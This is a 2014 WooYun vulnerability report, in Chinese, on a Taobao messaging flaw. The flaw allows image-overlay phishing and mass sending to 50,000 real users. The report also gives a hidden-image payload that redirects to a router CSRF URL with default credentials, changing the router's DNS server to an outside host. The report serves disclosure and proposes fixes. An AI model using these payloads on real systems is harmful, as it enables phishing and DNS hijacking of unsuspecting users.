当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048499

漏洞标题:对淘宝所有用户大规模DNS劫持攻击

相关厂商:阿里巴巴

漏洞作者: bing

提交时间:2014-01-10 17:20

修复时间:2014-02-24 17:21

公开时间:2014-02-24 17:21

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-10: 细节已通知厂商并且等待厂商处理中
2014-01-10: 厂商已经确认,细节仅向厂商公开
2014-01-20: 细节向核心白帽子及相关领域专家公开
2014-01-30: 细节向普通白帽子公开
2014-02-09: 细节向实习白帽子公开
2014-02-24: 细节向公众公开

简要描述:

对所有用户的DNS劫持攻击

详细说明:

1、第一种鸡肋利用方式XSIO攻击
原本以为只是发现了鸡肋的xsio漏洞,不甘平凡测试一天想起我们还可以实现DNS劫持攻击将漏洞危害实现最大化。这些得从周五说起~
又到周五晚刷分的时候啦!这个时候通过淘宝网站导航点进了淘宝小分队http://yiqi.taobao.com/,苦寻半天没有任何收获,这时候随意一瞥邀请加入引起了我的注意。

11111111111111111.jpg


通过抓包发现邀请内容content参数为我们可控,心理小小的鸡动了一把,知道肯定有戏!

2222222222222222.jpg


将content内容解码发现还支持<、>、/等字符又暗自窃喜了一把

33333333333333.jpg


经过一番疯狂的测试发现对html事件、javascript敏感关键词全部都进行了严格过滤。但是,,,细心的白帽子还是发现了没有限制图片属性position为absolute,导致可以控制一张图片出现在网页的任意位置。那么我们就可以用这张图片去覆盖网页上的任意一个位置,包括网站的banner,包括一个link、一个button。这就可以导致页面破坏。而给图片设置一个链接后,很显然就可以起到一个钓鱼的作用,最终鸡肋的XSIO漏洞就实现了。利用代码如下

a href="http://bingsec.com?spm=0.0.0.0.LyuuFi" target="_blank" data-spm-anchor-id="0.0.0.0"><img src="http://img01.taobaocdn.com/poster_pic/T1qMpCFrRXXXXXXXXX" style="position: absolute;left:-110px;top:1px;" width="240" height="240"></a>


这时候我们登录上淘宝http://www.taobao.com,成功的将发送者和其它内容遮挡。用户竟然发现淘宝几百年难得一遇的搞起了大抽奖还是肯定中奖这时候就进入了我们的钓鱼网站圈套啦~

4444444444444444444.jpg


那如何说明xsio的危害范围呢?我们不要忘记了receiverIds参数,他是用户的唯一标识参数也就是说这个消息给哪个用户发送。可以看出参数内容为纯数字有规律,那说明是可实现自动化发送了。那我们就证明下我们的推断,也判断下这个发送接口是否对发送次数等做了限制。

55555555555555555555555.jpg


这时候我向了5万用户发送了该测试内容,测试只是诱导点击指向我的blog。可以看出该接口,并没有对发送次数、时间、是否为好友等做验证,这也是导致大规模的关键因素。下面为24个小时的数据统计

66666666666666666.jpg


上图可以看出5万用户收到该内容,却只有100个用户受到影响。但XSIO是诱导用户点击才会受到诱骗。依靠淘宝强大用户注册量大胆推断下XSIO漏洞每天会有多少用户点击,我们以5亿用户为基础,5万用户有100个受到攻击,可以推算出每天会有至少100万用户受到该漏洞攻击。5万用户xsio攻击7日上线情况

7777777777777777.jpg


虽然影响范围是有了,但是XSIO还是过于鸡肋。有没有办法突破被动为主动攻击呢?下文就有了,
2、加强攻击方式DNS劫持
新的攻击方法DNS劫持,DNS攻击的构造方法就不多做介绍了,看下面的攻击代码吧
<div style="display:none;"><img src="http://www.v5yw.net/bg.jpg" width=0 height=0></div>
上面src源进行了302跳转。最终会跳到
http://admin:[email protected]/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=&dnsserver=54.248.102.5&dnsserver2=8.8.8.8&Save=%25B1%25A3+%25B4%25E6
秀一张成功DNS劫持攻击被360拦截的截图,当用户浏览互动提醒就直接触发DNS劫持攻击。如果将5亿用户全部推送DNS劫持攻击,看来DNS服务器得很牛逼才行啊。这下体现出危害了,不管是吃广告费还是做支付宝钓鱼应该都很赚钱吧。。。

888888888888888888888888.jpg


999999999999999999999999.jpg

漏洞证明:

888888888888888888888888.jpg


999999999999999999999999.jpg

修复方案:

1、过滤src源;
2、过滤position属性为absolute
3、限制发送次数&判断是否为好友

版权声明:转载请注明来源 bing@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-01-10 17:50

厂商回复:

感谢你对我们的支持与关注,该问题已有白帽子提交到asrc,且正在修复中。

最新状态:

暂无